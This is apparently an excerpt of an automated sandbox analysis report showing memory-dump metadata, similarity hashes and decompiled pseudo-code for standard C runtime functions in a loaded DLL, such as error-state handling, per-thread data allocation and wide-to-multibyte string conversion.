    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Mpunctshared_ptrstd::ios_base::getloc
    • String ID:
    • API String ID: 2231573426-0
    • Opcode ID: 220717857406bf0262eb632dca495e7c702cb41ccef9cac6511460e49d6aa484
    • Instruction ID: f8dd3090d6863d28ecfd08f4f8399d4f38dfccea11c616a49ffe652d4e814535
    • Opcode Fuzzy Hash: 220717857406bf0262eb632dca495e7c702cb41ccef9cac6511460e49d6aa484
    • Instruction Fuzzy Hash: 67710DB690020DDFDB14DFE8C890EDEB7B9BF48314F148619E519AB291EB34A945CF90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E207257, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E6E207257(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x6e24b180 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E6E20848B(__eflags,  *0x6e24b180);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E2084C6(__eflags,  *0x6e24b180, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t28 = E6E208989(_t16);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E2084C6(__eflags,  *0x6e24b180, 0);
								} else {
									__eflags = E6E2084C6(__eflags,  *0x6e24b180, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6E208994(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








    0x6e20725e
    0x6e207271
    0x6e207278
    0x6e20727b
    0x6e20727e
    0x6e207297
    0x6e207297
    0x6e207280
    0x6e207280
    0x6e207282
    0x6e20728c
    0x6e207292
    0x6e207293
    0x6e207295
    0x6e20729c
    0x6e20729e
    0x6e2072a5
    0x6e2072a9
    0x6e2072ab
    0x6e2072bf
    0x6e2072bf
    0x6e2072c8
    0x6e2072ad
    0x6e2072bb
    0x6e2072bd
    0x6e2072d1
    0x6e2072d3
    0x6e2072d3
    0x00000000
    0x00000000
    0x00000000
    0x6e2072bd
    0x6e2072d6
    0x00000000
    0x00000000
    0x00000000
    0x6e207295
    0x6e207282
    0x6e2072de
    0x6e2072e8
    0x6e207260
    0x6e207262
    0x6e207262

    APIs
    • GetLastError.KERNEL32(00000001,?,6E207155,6E2041DB,6E203DF2,?,6E20400F,?,00000001,?,?,00000001,?,6E249148,0000000C,6E204103), ref: 6E207265
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E207273
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E20728C
    • SetLastError.KERNEL32(00000000,6E20400F,?,00000001,?,?,00000001,?,6E249148,0000000C,6E204103,?,00000001,?), ref: 6E2072DE
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 0c1dc9c848423c275a3243b4b260ed161f0affb62cd0fda081de415c6e460cfd
    • Instruction ID: 5b597e761158404b3990a70ed9704d0295b08bb6f4cc73fa04250046329ee0c6
    • Opcode Fuzzy Hash: 0c1dc9c848423c275a3243b4b260ed161f0affb62cd0fda081de415c6e460cfd
    • Instruction Fuzzy Hash: 7601D47621CA1FAFAB5836F5AC8C99B2B5BFB02779724022AF514545D4EF9148019170
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20FA06, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
    Download Yara Rule
    C-Code - Quality: 69%
    			E6E20FA06(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6e24b2d0; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6E20FB55(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6E213908(_t25, _t36, __eflags,  *0x6e24b2d0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E20F84C(_t25, _t31, 0x6e2e36a8);
							E6E20FBB2(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6E20FBB2();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6E20D659(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6e24b2d0; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6E20FB55(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6E213908(_t27, _t37, __eflags,  *0x6e24b2d0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6E20F84C(_t27, _t32, 0x6e2e36a8);
									E6E20FBB2(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6E20FBB2();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6E2138B2(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6E2138B2(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















    0x6e20fa06
    0x6e20fa06
    0x6e20fa06
    0x6e20fa10
    0x6e20fa12
    0x6e20fa17
    0x6e20fa1a
    0x6e20fa28
    0x6e20fa2f
    0x6e20fa34
    0x6e20fa37
    0x6e20fa3a
    0x6e20fa4c
    0x6e20fa51
    0x6e20fa53
    0x6e20fa5e
    0x6e20fa65
    0x6e20fa6a
    0x6e20fa6d
    0x6e20fa6f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e20fa55
    0x6e20fa55
    0x00000000
    0x6e20fa55
    0x6e20fa3c
    0x6e20fa3c
    0x6e20fa3d
    0x6e20fa3d
    0x6e20fa42
    0x6e20fa7d
    0x6e20fa7e
    0x6e20fa84
    0x6e20fa89
    0x6e20fa8c
    0x6e20fa8d
    0x6e20fa8e
    0x6e20fa95
    0x6e20fa97
    0x6e20fa99
    0x6e20fa9e
    0x6e20faa1
    0x6e20faaf
    0x6e20fabb
    0x6e20fabe
    0x6e20fac1
    0x6e20fad3
    0x6e20fad8
    0x6e20fada
    0x6e20fae5
    0x6e20faeb
    0x6e20faf3
    0x6e20faf5
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e20fadc
    0x6e20fadc
    0x00000000
    0x6e20fadc
    0x6e20fac3
    0x6e20fac3
    0x6e20fac4
    0x6e20fac4
    0x6e20faf7
    0x6e20faf8
    0x6e20faf8
    0x6e20faa3
    0x6e20faa9
    0x6e20faad
    0x6e20fb00
    0x6e20fb01
    0x6e20fb07
    0x00000000
    0x00000000
    0x00000000
    0x6e20faad
    0x6e20fb0e
    0x6e20fb0e
    0x6e20fa1c
    0x6e20fa22
    0x6e20fa26
    0x6e20fa71
    0x6e20fa72
    0x6e20fa7c
    0x00000000
    0x00000000
    0x00000000
    0x6e20fa26

    APIs
    • GetLastError.KERNEL32(?,?,6E20A016,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001), ref: 6E20FA0A
    • _free.LIBCMT ref: 6E20FA3D
    • _free.LIBCMT ref: 6E20FA65
    • SetLastError.KERNEL32(00000000,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001,?,?,?,?,?,?,?,6E200044), ref: 6E20FA72
    • SetLastError.KERNEL32(00000000,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001,?,?,?,?,?,?,?,6E200044), ref: 6E20FA7E
    • _abort.LIBCMT ref: 6E20FA84
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: 6bd989ad69b732a5543da56d7345af9d2913c942bee844a09fbd6fce5289cc46
    • Instruction ID: 6bb2da3f4549f8a14fa0f970c29371a096abde82e77326d042aee85cf32187c5
    • Opcode Fuzzy Hash: 6bd989ad69b732a5543da56d7345af9d2913c942bee844a09fbd6fce5289cc46
    • Instruction Fuzzy Hash: DEF0D63A5D4A0EABE74293B45C2CE9F267FAFC2727F390415F914962C8EF6484418538
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20E01E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
    Download Yara Rule
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E20DFCF,6E20E0B7,?,6E20DF6F,6E20E0B7,6E2494E8,0000000C), ref: 6E20E03E
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E20E051
    • FreeLibrary.KERNEL32(00000000,?,?,?,6E20DFCF,6E20E0B7,?,6E20DF6F,6E20E0B7,6E2494E8,0000000C), ref: 6E20E074
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 4538f9791c4397e984ad54f25970532828a4bed1d871d8ddd6ca41dfbfaa5cd2
    • Instruction ID: 24f9a5794e987ed89e11aca677ccf59aaa62434eaad5653aadfa4b54fd3f9c92
    • Opcode Fuzzy Hash: 4538f9791c4397e984ad54f25970532828a4bed1d871d8ddd6ca41dfbfaa5cd2
    • Instruction Fuzzy Hash: B7F04F71A0061DBFDF119BA0CD1DFDEBFBBEB05752F100064E815A6290CB718A84DEA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2128B1, Relevance: 7.7, APIs: 5, Instructions: 222COMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E6E2128B1(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E6E209118(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E6E20BB7E();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6E20BB7E();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6E20BB7E())) = 0x16;
					E6E208929();
					goto L59;
				} else {
					L59:
					return E6E203D51(_v8 ^ _t117);
				}
			}






































    0x6e2128b1
    0x6e2128b9
    0x6e2128c0
    0x6e2128c3
    0x6e2128c7
    0x6e2128cb
    0x6e2128cd
    0x6e2128d0
    0x6e2128d4
    0x6e2128d7
    0x6e2128dc
    0x6e2128eb
    0x6e21290b
    0x6e212910
    0x6e212915
    0x6e212ab2
    0x6e212abb
    0x6e212aed
    0x6e212af5
    0x6e212b01
    0x6e212b01
    0x6e212b06
    0x6e212b09
    0x00000000
    0x6e212afc
    0x6e212afc
    0x6e212afc
    0x6e212b0f
    0x6e212b13
    0x6e212b18
    0x6e212b18
    0x00000000
    0x6e212b1f
    0x6e212af5
    0x6e212abd
    0x6e212ac3
    0x6e212adb
    0x6e212adb
    0x00000000
    0x6e212adb
    0x6e212aca
    0x6e212acf
    0x6e212ad2
    0x6e212ad3
    0x6e212ad9
    0x00000000
    0x00000000
    0x00000000
    0x6e212ad9
    0x00000000
    0x6e212aca
    0x6e21291b
    0x6e212924
    0x6e21295e
    0x6e2129d7
    0x6e2129db
    0x6e2129f1
    0x6e212aa2
    0x6e212aa2
    0x6e212aa7
    0x6e212aaa
    0x00000000
    0x6e212a06
    0x6e212a08
    0x00000000
    0x00000000
    0x6e212a0e
    0x6e212a11
    0x6e212a11
    0x6e212a14
    0x6e212a1a
    0x6e212a1e
    0x6e212a1e
    0x6e212a30
    0x6e212a36
    0x6e212a39
    0x6e212a3d
    0x00000000
    0x00000000
    0x6e212a62
    0x00000000
    0x00000000
    0x6e212a68
    0x6e212a6a
    0x6e212a6f
    0x6e212a8f
    0x6e212a92
    0x6e212a95
    0x6e212a9a
    0x00000000
    0x00000000
    0x00000000
    0x6e212aa0
    0x6e212a71
    0x6e212a74
    0x6e212a74
    0x6e212a78
    0x6e212a7d
    0x00000000
    0x00000000
    0x6e212a86
    0x6e212a87
    0x6e212a88
    0x6e212a8d
    0x00000000
    0x00000000
    0x00000000
    0x6e212a8d
    0x00000000
    0x6e212a74
    0x00000000
    0x6e212a11
    0x6e2129f1
    0x6e2129e0
    0x00000000
    0x00000000
    0x6e2129e6
    0x6e2129e6
    0x00000000
    0x6e2129e6
    0x6e212962
    0x6e212988
    0x6e21299b
    0x6e21299f
    0x00000000
    0x6e2129af
    0x6e2129b7
    0x6e2129bd
    0x6e2129bd
    0x00000000
    0x6e2129b7
    0x6e21299f
    0x6e212964
    0x6e212966
    0x6e212969
    0x6e21296e
    0x6e212971
    0x6e212971
    0x6e212975
    0x00000000
    0x00000000
    0x00000000
    0x6e212975
    0x6e21297a
    0x6e212987
    0x6e212987
    0x00000000
    0x6e21297a
    0x6e212928
    0x00000000
    0x00000000
    0x6e212933
    0x6e21293e
    0x6e212941
    0x6e212944
    0x6e21294a
    0x00000000
    0x00000000
    0x6e212950
    0x6e212953
    0x00000000
    0x00000000
    0x00000000
    0x6e212955
    0x00000000
    0x6e212933
    0x6e2128f2
    0x6e2128f8
    0x00000000
    0x6e2128e2
    0x6e212b21
    0x6e212b31
    0x6e212b31

    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3bc86a1cbd34bfbc3b0e43ab3b1cd90601758962765f237ce85024fcca70766e
    • Instruction ID: 42918394c60b893f2407dd16302d7312cdc11e280ac5182c517a7e3d7a0b46fb
    • Opcode Fuzzy Hash: 3bc86a1cbd34bfbc3b0e43ab3b1cd90601758962765f237ce85024fcca70766e
    • Instruction Fuzzy Hash: 9D71C2B291821F9BDB218FD9C844AEEB7BBFF43311B104629FA2157184DB718B41D7A0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E211BFD, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E6E211BFD(void* __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				struct _STARTUPINFOW* _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				short _v1350;
				char _v1400;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t259;
				void* _t262;
				signed int _t265;
				signed int _t267;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t279;
				signed int _t281;
				void* _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t291;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				intOrPtr _t301;
				signed int _t304;
				signed int _t308;
				signed int* _t309;
				struct _STARTUPINFOW* _t311;
				signed int _t315;
				signed int _t316;
				signed int _t322;
				signed int _t325;
				signed int _t326;
				signed int _t328;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				signed int _t357;
				void* _t359;
				signed int _t361;
				void* _t362;
				intOrPtr _t363;
				signed int _t368;
				signed int _t369;
				intOrPtr* _t372;
				signed int _t386;
				signed int _t388;
				signed int _t390;
				intOrPtr* _t391;
				intOrPtr* _t393;
				signed int _t394;
				LPWSTR* _t396;
				signed int _t402;
				intOrPtr* _t406;
				intOrPtr* _t409;
				void* _t412;
				intOrPtr* _t413;
				intOrPtr* _t414;
				void* _t425;
				signed int _t429;
				signed int _t432;
				intOrPtr* _t433;
				signed int _t435;
				signed int* _t439;
				intOrPtr* _t446;
				intOrPtr* _t447;
				intOrPtr _t456;
				signed int _t457;
				short _t458;
				void* _t460;
				signed char _t461;
				signed int _t463;
				signed int _t464;
				signed int _t466;
				intOrPtr _t467;
				signed int _t470;
				intOrPtr _t471;
				signed int _t473;
				signed int _t475;
				signed int _t478;
				void* _t480;
				intOrPtr _t484;
				signed int _t485;
				signed int _t487;
				signed int _t488;
				signed int* _t489;
				signed int _t492;
				signed int _t494;
				signed int _t496;
				signed int _t500;
				signed int* _t501;
				intOrPtr* _t502;
				short _t503;
				signed int _t505;
				signed int _t506;
				void* _t508;
				void* _t509;
				signed int _t510;
				void* _t511;
				void* _t512;
				signed int _t513;
				void* _t515;
				void* _t516;
				intOrPtr _t529;

				_t456 = __edx;
				_v12 = 1;
				_t386 = E6E20FBEC(__ecx, 0x6a6);
				_t258 = 0;
				_t402 = _t480;
				if(_t386 == 0) {
					L20:
					return _t258;
				} else {
					_t2 = _t386 + 4; // 0x4
					_t466 = _t2;
					 *_t466 = 0;
					 *_t386 = 1;
					_t484 = _a4;
					_t4 = _t484 + 0x30; // 0x6e21145e
					_t259 = _t4;
					_push( *_t259);
					_v16 = _t259;
					_push(0x6e23fa74);
					_push( *0x6e23f92c);
					E6E211B3C(_t386, _t402, _t466, _t484, _t466, 0x351, 3);
					_t509 = _t508 + 0x18;
					_v8 = 0x6e23f92c;
					while(1) {
						L2:
						_t262 = E6E21BAEB(_t466, 0x351, 0x6e23fa70);
						_t510 = _t509 + 0xc;
						if(_t262 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t446 = _t8;
							_t368 =  *_v16;
							_v16 = _t446;
							_t447 =  *_t446;
							goto L4;
						}
						while(1) {
							L4:
							_t456 =  *_t368;
							if(_t456 !=  *_t447) {
								break;
							}
							if(_t456 == 0) {
								L8:
								_t369 = 0;
							} else {
								_t456 =  *((intOrPtr*)(_t368 + 2));
								if(_t456 !=  *((intOrPtr*)(_t447 + 2))) {
									break;
								} else {
									_t368 = _t368 + 4;
									_t447 = _t447 + 4;
									if(_t456 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t402 = _v8 + 0xc;
							_v8 = _t402;
							_v12 = _v12 &  !( ~_t369);
							_t372 = _v16;
							_v16 = _t372;
							_push( *_t372);
							_push(0x6e23fa74);
							_push( *_t402);
							E6E211B3C(_t386, _t402, _t466, _t484, _t466, 0x351, 3);
							_t509 = _t510 + 0x18;
							if(_v8 < 0x6e23f95c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E20FBB2(_t386);
									_t31 = _t484 + 0x28; // 0x30ff068b
									_t475 = _t466 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t484 + 0x28; // 0x30ff068b
											E6E20FBB2( *_t32);
										}
									}
									_t33 = _t484 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t475 == 1;
										if(_t475 == 1) {
											_t34 = _t484 + 0x24; // 0x30ff0c46
											E6E20FBB2( *_t34);
										}
									}
									 *(_t484 + 0x24) = 0;
									 *(_t484 + 0x1c) = 0;
									 *(_t484 + 0x28) = 0;
									 *((intOrPtr*)(_t484 + 0x20)) = 0;
									_t39 = _t484 + 0x40; // 0x10468b00
									_t258 =  *_t39;
								} else {
									_t20 = _t484 + 0x28; // 0x30ff068b
									_t478 = _t466 | 0xffffffff;
									_t529 =  *_t20;
									if(_t529 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t529 == 0) {
											_t21 = _t484 + 0x28; // 0x30ff068b
											E6E20FBB2( *_t21);
										}
									}
									_t22 = _t484 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t478 == 1) {
											_t23 = _t484 + 0x24; // 0x30ff0c46
											E6E20FBB2( *_t23);
										}
									}
									 *(_t484 + 0x24) =  *(_t484 + 0x24) & 0x00000000;
									_t26 = _t386 + 4; // 0x4
									_t258 = _t26;
									 *(_t484 + 0x1c) =  *(_t484 + 0x1c) & 0x00000000;
									 *(_t484 + 0x28) = _t386;
									 *((intOrPtr*)(_t484 + 0x20)) = _t258;
								}
								goto L20;
							}
							goto L146;
						}
						asm("sbb eax, eax");
						_t369 = _t368 | 0x00000001;
						__eflags = _t369;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E208956();
					asm("int3");
					_t505 = _t510;
					_t511 = _t510 - 0x1d0;
					_t265 =  *0x6e24b164; // 0x1dc3c76f
					_v56 = _t265 ^ _t505;
					_t267 = _v40;
					_push(_t386);
					_push(_t484);
					_t485 = _v36;
					_push(_t466);
					_t467 = _v44;
					_v508 = _t467;
					__eflags = _t267;
					if(_t267 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t388 = 0;
						_v452 = 0;
						__eflags = _t485;
						if(__eflags == 0) {
							L79:
							E6E211BFD(_t402, _t456, __eflags, _t467);
							goto L80;
						} else {
							__eflags =  *_t485 - 0x4c;
